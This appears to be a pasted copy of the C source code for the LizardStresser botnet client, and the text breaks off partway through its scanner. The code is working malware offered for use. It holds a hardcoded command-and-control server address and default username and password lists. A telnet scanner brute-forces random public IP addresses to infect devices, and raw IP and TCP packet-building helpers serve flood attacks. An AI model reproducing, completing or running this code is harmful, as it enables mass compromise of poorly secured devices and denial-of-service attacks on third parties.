Lizard Stresser Source Code

1.  
2. Client.c
3.  
4. /*
5. Chippy1337 and @packetprophet present:
6. LizardStresser rekt
7. This is the cross compiled bot
8.  
9. LICENSE AGREEMENT:
10. If you lulz'd, you must sent BTC to
11. 1N4MxbXsooU9aMU41NPrSbgZKpJjtwsnar
12.  
13. Death to skids
14. */
15.  
16. /*
17. THIS IS A BOT. AN IRC BOT.
18. YOU WILL LIKE THIS BOT AND THIS BOT WILL LIKE YOU.
19. IT IS VERY TINY AND WILL NOT TAKE UP MUCH OF YOUR SPACE AND TIME.
20. IT IS A VERY UNIVERSAL BOT. IT WILL WORK ON ALMOST ANYTHING YOU WANT IT TO WORK ON.
21. THIS IS A BOT. AN IRC BOT.
22. */
23.  
24.  
25.  
26. // ___ __ _
27. // / \___ / _(_)_ __ ___ ___
28. // / /\ / _ \ |_| | '_ \ / _ \/ __|
29. // / /_// __/ _| | | | | __/\__ \
30. // /___,' \___|_| |_|_| |_|\___||___/
31.  
32. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
33. #define PAD_RIGHT 1
34. #define PAD_ZERO 2
35. #define PRINT_BUF_LEN 12
36. #define CMD_IAC 255
37. #define CMD_WILL 251
38. #define CMD_WONT 252
39. #define CMD_DO 253
40. #define CMD_DONT 254
41. #define OPT_SGA 3
42.  
43. // _____ _ _
44. // \_ \_ __ ___| |_ _ __| | ___ ___
45. // / /\/ '_ \ / __| | | | |/ _` |/ _ \/ __|
46. // /\/ /_ | | | | (__| | |_| | (_| | __/\__ \
47. // \____/ |_| |_|\___|_|\__,_|\__,_|\___||___/
48.  
49. #include <stdlib.h>
50. #include <stdarg.h>
51. #include <stdio.h>
52. #include <sys/socket.h>
53. #include <sys/types.h>
54. #include <netinet/in.h>
55. #include <arpa/inet.h>
56. #include <netdb.h>
57. #include <signal.h>
58. #include <strings.h>
59. #include <string.h>
60. #include <sys/utsname.h>
61. #include <unistd.h>
62. #include <fcntl.h>
63. #include <errno.h>
64. #include <netinet/ip.h>
65. #include <netinet/udp.h>
66. #include <netinet/tcp.h>
67. #include <sys/wait.h>
68. #include <sys/ioctl.h>
69. #include <net/if.h>
70.  
71. // ___ __ _
72. // / __\___ _ __ / _(_) __ _
73. // / / / _ \| '_ \| |_| |/ _` |
74. // / /__| (_) | | | | _| | (_| |
75. // \____/\___/|_| |_|_| |_|\__, |
76. // |___/
77.  
78. unsigned char *commServer[] =
79. {
80. "93.174.93.113:164"
81. };
82.  
83. // ___ _
84. // / __\ _ _ __ ___| |_(_) ___ _ __ ___
85. // / _\| | | | '_ \ / __| __| |/ _ \| '_ \/ __|
86. // / / | |_| | | | | (__| |_| | (_) | | | \__ \
87. // \/ \__,_|_| |_|\___|\__|_|\___/|_| |_|___/
88.  
89. int initConnection();
90. int getBogos(unsigned char *bogomips);
91. int getCores();
92. int getCountry(unsigned char *buf, int bufsize);
93. void makeRandomStr(unsigned char *buf, int length);
94. int sockprintf(int sock, char *formatStr, ...);
95. char *inet_ntoa(struct in_addr in);
96.  
97. // ___ _ _ _
98. // / _ \ | ___ | |__ __ _| |___
99. // / /_\/ |/ _ \| '_ \ / _` | / __|
100. // / /_\\| | (_) | |_) | (_| | \__ \
101. // \____/|_|\___/|_.__/ \__,_|_|___/
102.  
103. int mainCommSock = 0, currentServer = -1, gotIP = 0;
104. uint32_t *pids;
105. uint32_t scanPid;
106. uint64_t numpids = 0;
107. struct in_addr ourIP;
108. unsigned char macAddress[6] = {0};
109. char *usernames[] = {"root\0", "\0", "admin\0", "user\0", "login\0", "guest\0"};
110. char *passwords[] = {"root\0", "\0", "toor\0", "admin\0", "user\0", "guest\0", "login\0", "changeme\0", "1234\0", "12345\0", "123456\0", "default\0", "pass\0", "password\0"};
111.  
112. // ___ ___ __ __ ___
113. // / __\/ _ \/__\ /\ \ \/ _ \
114. // / _\ / /_)/ \// / \/ / /_\/
115. // / / / ___/ _ \/ /\ / /_\\
116. // \/ \/ \/ \_/\_\ \/\____/
117.  
118. #define PHI 0x9e3779b9
119. static uint32_t Q[4096], c = 362436;
120.  
121. void init_rand(uint32_t x)
122. {
123. int i;
124.  
125. Q[0] = x;
126. Q[1] = x + PHI;
127. Q[2] = x + PHI + PHI;
128.  
129. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
130. }
131.  
132. uint32_t rand_cmwc(void)
133. {
134. uint64_t t, a = 18782LL;
135. static uint32_t i = 4095;
136. uint32_t x, r = 0xfffffffe;
137. i = (i + 1) & 4095;
138. t = a * Q[i] + c;
139. c = (uint32_t)(t >> 32);
140. x = t + c;
141. if (x < c) {
142. x++;
143. c++;
144. }
145. return (Q[i] = r - x);
146. }
147.  
148. // _ _ _
149. // /\ /\| |_(_) |___
150. // / / \ \ __| | / __|
151. // \ \_/ / |_| | \__ \
152. // \___/ \__|_|_|___/
153.  
154. void trim(char *str)
155. {
156. int i;
157. int begin = 0;
158. int end = strlen(str) - 1;
159.  
160. while (isspace(str[begin])) begin++;
161.  
162. while ((end >= begin) && isspace(str[end])) end--;
163. for (i = begin; i <= end; i++) str[i - begin] = str[i];
164.  
165. str[i - begin] = '\0';
166. }
167.  
168. static void printchar(unsigned char **str, int c)
169. {
170. if (str) {
171. **str = c;
172. ++(*str);
173. }
174. else (void)write(1, &c, 1);
175. }
176.  
177. static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
178. {
179. register int pc = 0, padchar = ' ';
180.  
181. if (width > 0) {
182. register int len = 0;
183. register const unsigned char *ptr;
184. for (ptr = string; *ptr; ++ptr) ++len;
185. if (len >= width) width = 0;
186. else width -= len;
187. if (pad & PAD_ZERO) padchar = '0';
188. }
189. if (!(pad & PAD_RIGHT)) {
190. for ( ; width > 0; --width) {
191. printchar (out, padchar);
192. ++pc;
193. }
194. }
195. for ( ; *string ; ++string) {
196. printchar (out, *string);
197. ++pc;
198. }
199. for ( ; width > 0; --width) {
200. printchar (out, padchar);
201. ++pc;
202. }
203.  
204. return pc;
205. }
206.  
207. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
208. {
209. unsigned char print_buf[PRINT_BUF_LEN];
210. register unsigned char *s;
211. register int t, neg = 0, pc = 0;
212. register unsigned int u = i;
213.  
214. if (i == 0) {
215. print_buf[0] = '0';
216. print_buf[1] = '\0';
217. return prints (out, print_buf, width, pad);
218. }
219.  
220. if (sg && b == 10 && i < 0) {
221. neg = 1;
222. u = -i;
223. }
224.  
225. s = print_buf + PRINT_BUF_LEN-1;
226. *s = '\0';
227.  
228. while (u) {
229. t = u % b;
230. if( t >= 10 )
231. t += letbase - '0' - 10;
232. *--s = t + '0';
233. u /= b;
234. }
235.  
236. if (neg) {
237. if( width && (pad & PAD_ZERO) ) {
238. printchar (out, '-');
239. ++pc;
240. --width;
241. }
242. else {
243. *--s = '-';
244. }
245. }
246.  
247. return pc + prints (out, s, width, pad);
248. }
249.  
250. static int print(unsigned char **out, const unsigned char *format, va_list args )
251. {
252. register int width, pad;
253. register int pc = 0;
254. unsigned char scr[2];
255.  
256. for (; *format != 0; ++format) {
257. if (*format == '%') {
258. ++format;
259. width = pad = 0;
260. if (*format == '\0') break;
261. if (*format == '%') goto out;
262. if (*format == '-') {
263. ++format;
264. pad = PAD_RIGHT;
265. }
266. while (*format == '0') {
267. ++format;
268. pad |= PAD_ZERO;
269. }
270. for ( ; *format >= '0' && *format <= '9'; ++format) {
271. width *= 10;
272. width += *format - '0';
273. }
274. if( *format == 's' ) {
275. register char *s = (char *)va_arg( args, int );
276. pc += prints (out, s?s:"(null)", width, pad);
277. continue;
278. }
279. if( *format == 'd' ) {
280. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
281. continue;
282. }
283. if( *format == 'x' ) {
284. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
285. continue;
286. }
287. if( *format == 'X' ) {
288. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
289. continue;
290. }
291. if( *format == 'u' ) {
292. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
293. continue;
294. }
295. if( *format == 'c' ) {
296. scr[0] = (unsigned char)va_arg( args, int );
297. scr[1] = '\0';
298. pc += prints (out, scr, width, pad);
299. continue;
300. }
301. }
302. else {
303. out:
304. printchar (out, *format);
305. ++pc;
306. }
307. }
308. if (out) **out = '\0';
309. va_end( args );
310. return pc;
311. }
312.  
313. int zprintf(const unsigned char *format, ...)
314. {
315. va_list args;
316. va_start( args, format );
317. return print( 0, format, args );
318. }
319.  
320. int szprintf(unsigned char *out, const unsigned char *format, ...)
321. {
322. va_list args;
323. va_start( args, format );
324. return print( &out, format, args );
325. }
326.  
327.  
328. int sockprintf(int sock, char *formatStr, ...)
329. {
330. unsigned char *textBuffer = malloc(2048);
331. memset(textBuffer, 0, 2048);
332. char *orig = textBuffer;
333. va_list args;
334. va_start(args, formatStr);
335. print(&textBuffer, formatStr, args);
336. va_end(args);
337. orig[strlen(orig)] = '\n';
338. zprintf("buf: %s\n", orig);
339. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
340. free(orig);
341. return q;
342. }
343.  
344. static int *fdopen_pids;
345.  
346. int fdpopen(unsigned char *program, register unsigned char *type)
347. {
348. register int iop;
349. int pdes[2], fds, pid;
350.  
351. if (*type != 'r' && *type != 'w' || type[1]) return -1;
352.  
353. if (pipe(pdes) < 0) return -1;
354. if (fdopen_pids == NULL) {
355. if ((fds = getdtablesize()) <= 0) return -1;
356. if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
357. memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
358. }
359.  
360. switch (pid = vfork())
361. {
362. case -1:
363. close(pdes[0]);
364. close(pdes[1]);
365. return -1;
366. case 0:
367. if (*type == 'r') {
368. if (pdes[1] != 1) {
369. dup2(pdes[1], 1);
370. close(pdes[1]);
371. }
372. close(pdes[0]);
373. } else {
374. if (pdes[0] != 0) {
375. (void) dup2(pdes[0], 0);
376. (void) close(pdes[0]);
377. }
378. (void) close(pdes[1]);
379. }
380. execl("/bin/sh", "sh", "-c", program, NULL);
381. _exit(127);
382. }
383. if (*type == 'r') {
384. iop = pdes[0];
385. (void) close(pdes[1]);
386. } else {
387. iop = pdes[1];
388. (void) close(pdes[0]);
389. }
390. fdopen_pids[iop] = pid;
391. return (iop);
392. }
393.  
394. int fdpclose(int iop)
395. {
396. register int fdes;
397. sigset_t omask, nmask;
398. int pstat;
399. register int pid;
400.  
401. if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
402. (void) close(iop);
403. sigemptyset(&nmask);
404. sigaddset(&nmask, SIGINT);
405. sigaddset(&nmask, SIGQUIT);
406. sigaddset(&nmask, SIGHUP);
407. (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
408. do {
409. pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
410. } while (pid == -1 && errno == EINTR);
411. (void) sigprocmask(SIG_SETMASK, &omask, NULL);
412. fdopen_pids[fdes] = 0;
413. return (pid == -1 ? -1 : WEXITSTATUS(pstat));
414. }
415.  
416. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
417. {
418. int got = 1, total = 0;
419. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
420. return got == 0 ? NULL : buffer;
421. }
422.  
423. static const long hextable[] = {
424. [0 ... 255] = -1,
425. ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
426. ['A'] = 10, 11, 12, 13, 14, 15,
427. ['a'] = 10, 11, 12, 13, 14, 15
428. };
429.  
430. long parseHex(unsigned char *hex)
431. {
432. long ret = 0;
433. while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
434. return ret;
435. }
436.  
437. int wildString(const unsigned char* pattern, const unsigned char* string) {
438. switch(*pattern)
439. {
440. case '\0': return *string;
441. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
442. case '?': return !(*string && !wildString(pattern+1, string+1));
443. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
444. }
445. }
446.  
447. int getHost(unsigned char *toGet, struct in_addr *i)
448. {
449. struct hostent *h;
450. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
451. return 0;
452. }
453.  
454. void uppercase(unsigned char *str)
455. {
456. while(*str) { *str = toupper(*str); str++; }
457. }
458.  
459. int getBogos(unsigned char *bogomips)
460. {
461. int cmdline = open("/proc/cpuinfo", O_RDONLY);
462. char linebuf[4096];
463. while(fdgets(linebuf, 4096, cmdline) != NULL)
464. {
465. uppercase(linebuf);
466. if(strstr(linebuf, "BOGOMIPS") == linebuf)
467. {
468. unsigned char *pos = linebuf + 8;
469. while(*pos == ' ' || *pos == '\t' || *pos == ':') pos++;
470. while(pos[strlen(pos)-1] == '\r' || pos[strlen(pos)-1] == '\n') pos[strlen(pos)-1]=0;
471. if(strchr(pos, '.') != NULL) *strchr(pos, '.') = 0x00;
472. strcpy(bogomips, pos);
473. close(cmdline);
474. return 0;
475. }
476. memset(linebuf, 0, 4096);
477. }
478. close(cmdline);
479. return 1;
480. }
481.  
482. int getCores()
483. {
484. int totalcores = 0;
485. int cmdline = open("/proc/cpuinfo", O_RDONLY);
486. char linebuf[4096];
487. while(fdgets(linebuf, 4096, cmdline) != NULL)
488. {
489. uppercase(linebuf);
490. if(strstr(linebuf, "BOGOMIPS") == linebuf) totalcores++;
491. memset(linebuf, 0, 4096);
492. }
493. close(cmdline);
494. return totalcores;
495.  
496. }
497.  
498. void makeRandomStr(unsigned char *buf, int length)
499. {
500. int i = 0;
501. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
502. }
503.  
504. int recvLine(int socket, unsigned char *buf, int bufsize)
505. {
506. memset(buf, 0, bufsize);
507.  
508. fd_set myset;
509. struct timeval tv;
510. tv.tv_sec = 30;
511. tv.tv_usec = 0;
512. FD_ZERO(&myset);
513. FD_SET(socket, &myset);
514. int selectRtn, retryCount;
515. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
516. while(retryCount < 10)
517. {
518. sockprintf(mainCommSock, "PING");
519.  
520. tv.tv_sec = 30;
521. tv.tv_usec = 0;
522. FD_ZERO(&myset);
523. FD_SET(socket, &myset);
524. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
525. retryCount++;
526. continue;
527. }
528.  
529. break;
530. }
531. }
532.  
533. unsigned char tmpchr;
534. unsigned char *cp;
535. int count = 0;
536.  
537. cp = buf;
538. while(bufsize-- > 1)
539. {
540. if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
541. *cp = 0x00;
542. return -1;
543. }
544. *cp++ = tmpchr;
545. if(tmpchr == '\n') break;
546. count++;
547. }
548. *cp = 0x00;
549.  
550. zprintf("recv: %s\n", cp);
551.  
552. return count;
553. }
554.  
555. int connectTimeout(int fd, char *host, int port, int timeout)
556. {
557. struct sockaddr_in dest_addr;
558. fd_set myset;
559. struct timeval tv;
560. socklen_t lon;
561.  
562. int valopt;
563. long arg = fcntl(fd, F_GETFL, NULL);
564. arg |= O_NONBLOCK;
565. fcntl(fd, F_SETFL, arg);
566.  
567. dest_addr.sin_family = AF_INET;
568. dest_addr.sin_port = htons(port);
569. if(getHost(host, &dest_addr.sin_addr)) return 0;
570. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
571. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
572.  
573. if (res < 0) {
574. if (errno == EINPROGRESS) {
575. tv.tv_sec = timeout;
576. tv.tv_usec = 0;
577. FD_ZERO(&myset);
578. FD_SET(fd, &myset);
579. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
580. lon = sizeof(int);
581. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
582. if (valopt) return 0;
583. }
584. else return 0;
585. }
586. else return 0;
587. }
588.  
589. arg = fcntl(fd, F_GETFL, NULL);
590. arg &= (~O_NONBLOCK);
591. fcntl(fd, F_SETFL, arg);
592.  
593. return 1;
594. }
595.  
596. int listFork()
597. {
598. uint32_t parent, *newpids, i;
599. parent = fork();
600. if (parent <= 0) return parent;
601. numpids++;
602. newpids = (uint32_t*)malloc((numpids + 1) * 4);
603. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
604. newpids[numpids - 1] = parent;
605. free(pids);
606. pids = newpids;
607. return parent;
608. }
609.  
610. int negotiate(int sock, unsigned char *buf, int len)
611. {
612. unsigned char c;
613.  
614. switch (buf[1]) {
615. case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0;
616. case CMD_WILL:
617. case CMD_WONT:
618. case CMD_DO:
619. case CMD_DONT:
620. c = CMD_IAC;
621. send(sock, &c, 1, MSG_NOSIGNAL);
622. if (CMD_WONT == buf[1]) c = CMD_DONT;
623. else if (CMD_DONT == buf[1]) c = CMD_WONT;
624. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
625. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
626. send(sock, &c, 1, MSG_NOSIGNAL);
627. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
628. break;
629.  
630. default:
631. break;
632. }
633.  
634. return 0;
635. }
636.  
637. int matchPrompt(char *bufStr)
638. {
639. char *prompts = ":>%$#\0";
640.  
641. int bufLen = strlen(bufStr);
642. int i, q = 0;
643. for(i = 0; i < strlen(prompts); i++)
644. {
645. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
646. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
647. }
648.  
649. return 0;
650. }
651.  
652. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
653. {
654. int bufferUsed = initialIndex, got = 0, found = 0;
655. fd_set myset;
656. struct timeval tv;
657. tv.tv_sec = timeout;
658. tv.tv_usec = timeoutusec;
659. unsigned char *initialRead = NULL;
660.  
661. while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
662. {
663. FD_ZERO(&myset);
664. FD_SET(fd, &myset);
665. if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
666. initialRead = buffer + bufferUsed;
667. got = recv(fd, initialRead, 1, 0);
668. if(got == -1 || got == 0) return 0;
669. bufferUsed += got;
670. if(*initialRead == 0xFF)
671. {
672. got = recv(fd, initialRead + 1, 2, 0);
673. if(got == -1 || got == 0) return 0;
674. bufferUsed += got;
675. if(!negotiate(fd, initialRead, 3)) return 0;
676. } else {
677. if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
678. }
679. }
680.  
681. if(found) return 1;
682. return 0;
683. }
684.  
685. // _____ ___ _ _ _
686. // \_ \/ _ \ /\ /\| |_(_) |___
687. // / /\/ /_)/ / / \ \ __| | / __|
688. // /\/ /_/ ___/ \ \_/ / |_| | \__ \
689. // \____/\/ \___/ \__|_|_|___/
690.  
691. static uint8_t ipState[5] = {0}; //starting from 1 becuz yolo
692. in_addr_t getRandomPublicIP()
693. {
694. if(ipState[1] > 0 && ipState[4] < 255)
695. {
696. ipState[4]++;
697. char ip[16] = {0};
698. szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
699. return inet_addr(ip);
700. }
701.  
702. ipState[1] = rand() % 255;
703. ipState[2] = rand() % 255;
704. ipState[3] = rand() % 255;
705. ipState[4] = 0;
706. while(
707. (ipState[1] == 0) ||
708. (ipState[1] == 10) ||
709. (ipState[1] == 100 && (ipState[2] >= 64 && ipState[2] <= 127)) ||
710. (ipState[1] == 127) ||
711. (ipState[1] == 169 && ipState[2] == 254) ||
712. (ipState[1] == 172 && (ipState[2] <= 16 && ipState[2] <= 31)) ||
713. (ipState[1] == 192 && ipState[2] == 0 && ipState[3] == 2) ||
714. (ipState[1] == 192 && ipState[2] == 88 && ipState[3] == 99) ||
715. (ipState[1] == 192 && ipState[2] == 168) ||
716. (ipState[1] == 198 && (ipState[2] == 18 || ipState[2] == 19)) ||
717. (ipState[1] == 198 && ipState[2] == 51 && ipState[3] == 100) ||
718. (ipState[1] == 203 && ipState[2] == 0 && ipState[3] == 113) ||
719. (ipState[1] >= 224)
720. )
721. {
722. ipState[1] = rand() % 255;
723. ipState[2] = rand() % 255;
724. ipState[3] = rand() % 255;
725. }
726.  
727. char ip[16] = {0};
728. szprintf(ip, "%d.%d.%d.0", ipState[1], ipState[2], ipState[3]);
729. return inet_addr(ip);
730. }
731.  
732. in_addr_t getRandomIP(in_addr_t netmask)
733. {
734. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
735. return tmp ^ ( rand_cmwc() & ~netmask);
736. }
737.  
738. unsigned short csum (unsigned short *buf, int count)
739. {
740. register uint64_t sum = 0;
741. while( count > 1 ) { sum += *buf++; count -= 2; }
742. if(count > 0) { sum += *(unsigned char *)buf; }
743. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
744. return (uint16_t)(~sum);
745. }
746.  
747. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
748. {
749.  
750. struct tcp_pseudo
751. {
752. unsigned long src_addr;
753. unsigned long dst_addr;
754. unsigned char zero;
755. unsigned char proto;
756. unsigned short length;
757. } pseudohead;
758. unsigned short total_len = iph->tot_len;
759. pseudohead.src_addr=iph->saddr;
760. pseudohead.dst_addr=iph->daddr;
761. pseudohead.zero=0;
762. pseudohead.proto=IPPROTO_TCP;
763. pseudohead.length=htons(sizeof(struct tcphdr));
764. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
765. unsigned short *tcp = malloc(totaltcp_len);
766. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
767. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
768. unsigned short output = csum(tcp,totaltcp_len);
769. free(tcp);
770. return output;
771. }
772.  
773. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
774. {
775. iph->ihl = 5;
776. iph->version = 4;
777. iph->tos = 0;
778. iph->tot_len = sizeof(struct iphdr) + packetSize;
779. iph->id = rand_cmwc();
780. iph->frag_off = 0;
781. iph->ttl = MAXTTL;
782. iph->protocol = protocol;
783. iph->check = 0;
784. iph->saddr = source;
785. iph->daddr = dest;
786. }
787.  
788. int sclose(int fd)
789. {
790. if(3 > fd) return 1;
791. close(fd);
792. return 0;
793. }
794.  
795. // _____ _ _ __ _ _
796. // /__ \___| |_ __ ___| |_ / _\ ___ __ _ _ __ _ __ ___ _ __ | | ___| |
797. // / /\/ _ \ | '_ \ / _ \ __| \ \ / __/ _` | '_ \| '_ \ / _ \ '__| | |/ _ \ |
798. // / / | __/ | | | | __/ |_ _\ \ (_| (_| | | | | | | | __/ | | | __/ |
799. // \/ \___|_|_| |_|\___|\__| \__/\___\__,_|_| |_|_| |_|\___|_| |_|\___|_|
800.  
801. void StartTheLelz()
802. {
803. int max = (getdtablesize() / 4) * 3, i, res;
804. fd_set myset;
805. struct timeval tv;
806. socklen_t lon;
807. int valopt;
808.  
809. max = max > 512 ? 512 : max;
810.  
811. struct sockaddr_in dest_addr;
812. dest_addr.sin_family = AF_INET;
813. dest_addr.sin_port = htons(23);
814. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
815.  
816. struct telstate_t
817. {
818. int fd;
819. uint32_t ip;
820. uint8_t state;
821. uint8_t complete;
822. uint8_t usernameInd;
823. uint8_t passwordInd;
824. uint32_t totalTimeout;
825. uint16_t bufUsed;
826. char *sockbuf;
827. } fds[max];
828. memset(fds, 0, max * (sizeof(int) + 1));
829. for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); }
830.  
831. while(1)
832. {
833. for(i = 0; i < max; i++)
834. {
835. switch(fds[i].state)
836. {
837. case 0:
838. {
839. memset(fds[i].sockbuf, 0, 1024);
840.  
841. if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); }
842. else {
843. fds[i].passwordInd++;
844. if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; }
845. if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; }
846. }
847. dest_addr.sin_family = AF_INET;
848. dest_addr.sin_port = htons(23);
849. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
850. dest_addr.sin_addr.s_addr = fds[i].ip;
851. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
852. if(fds[i].fd == -1) { continue; }
853. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
854. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { sclose(fds[i].fd); fds[i].complete = 1; }
855. else { fds[i].state = 1; fds[i].totalTimeout = 0; }
856. }
857. break;
858.  
859. case 1:
860. {
861. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
862.  
863. FD_ZERO(&myset);
864. FD_SET(fds[i].fd, &myset);
865. tv.tv_sec = 0;
866. tv.tv_usec = 10000;
867. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
868. if(res == 1)
869. {
870. lon = sizeof(int);
871. valopt = 0;
872. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
873. if(valopt)
874. {
875. sclose(fds[i].fd);
876. fds[i].state = 0;
877. fds[i].complete = 1;
878. } else {
879. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
880. fds[i].totalTimeout = 0;
881. fds[i].bufUsed = 0;
882. memset(fds[i].sockbuf, 0, 1024);
883. fds[i].state = 2;
884. continue;
885. }
886. } else if(res == -1)
887. {
888. sclose(fds[i].fd);
889. fds[i].state = 0;
890. fds[i].complete = 1;
891. }
892.  
893. if(fds[i].totalTimeout + 10 < time(NULL))
894. {
895. sclose(fds[i].fd);
896. fds[i].state = 0;
897. fds[i].complete = 1;
898. }
899. }
900. break;
901.  
902. case 2:
903. {
904. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
905.  
906. if(readUntil(fds[i].fd, "ogin:", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
907. {
908. fds[i].totalTimeout = 0;
909. fds[i].bufUsed = 0;
910. memset(fds[i].sockbuf, 0, 1024);
911. fds[i].state = 3;
912. continue;
913. } else {
914. fds[i].bufUsed = strlen(fds[i].sockbuf);
915. }
916.  
917. if(fds[i].totalTimeout + 30 < time(NULL))
918. {
919. sclose(fds[i].fd);
920. fds[i].state = 0;
921. fds[i].complete = 1;
922. }
923. }
924. break;
925.  
926. case 3:
927. {
928. if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
929. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
930. fds[i].state = 4;
931. }
932. break;
933.  
934. case 4:
935. {
936. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
937.  
938. if(readUntil(fds[i].fd, "assword:", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
939. {
940. fds[i].totalTimeout = 0;
941. fds[i].bufUsed = 0;
942. if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5;
943. else fds[i].state = 100;
944. memset(fds[i].sockbuf, 0, 1024);
945. continue;
946. } else {
947. if(strstr(fds[i].sockbuf, "ncorrect") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
948. fds[i].bufUsed = strlen(fds[i].sockbuf);
949. }
950.  
951. if(fds[i].totalTimeout + 30 < time(NULL))
952. {
953. sclose(fds[i].fd);
954. fds[i].state = 0;
955. fds[i].complete = 1;
956. }
957. }
958. break;
959.  
960. case 5:
961. {
962. if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
963. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
964. fds[i].state = 6;
965. }
966. break;
967.  
968. case 6:
969. {
970. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
971.  
972. if(readUntil(fds[i].fd, "ncorrect", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
973. {
974. fds[i].totalTimeout = 0;
975. fds[i].bufUsed = 0;
976. if(strstr(fds[i].sockbuf, "ncorrect") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
977. if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
